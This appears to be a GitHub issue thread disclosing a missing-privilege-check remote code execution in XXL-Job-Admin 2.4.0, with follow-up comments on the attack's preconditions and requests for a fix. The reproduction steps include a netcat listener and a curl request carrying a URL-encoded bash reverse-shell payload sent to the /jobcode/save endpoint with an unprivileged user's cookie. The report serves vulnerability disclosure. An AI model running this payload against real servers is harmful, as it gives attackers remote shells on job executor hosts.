Remote Code Execution in /xxl-job-admin/jobcode/save

[N0th1n3]

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the /xxl-job-admin/jobcode/save does not validate user privilege. The modification of code in running cronjob for job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure OR reverse shell) on the job executor.

Steps to reproduce the behavior

Step 1: Create a listener
nc -nlvp 8888

Step 2: Create a unprivileged user and get its cookie

Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"

Step 4. Trigger the cronjob/wait until cronjob executes. A reverse shell will be executed.

[75ACOL]

Create an unprivileged user and get its cookie, which I don't think is easy for attackers.

[N0th1n3]

Agree. The assumption of the attack is that you gained an unprivileged account.

[xiemeng9462]

所以这个漏洞该怎么修复呢

[liuyucheng182]

同问，这个漏洞该如何修复呢。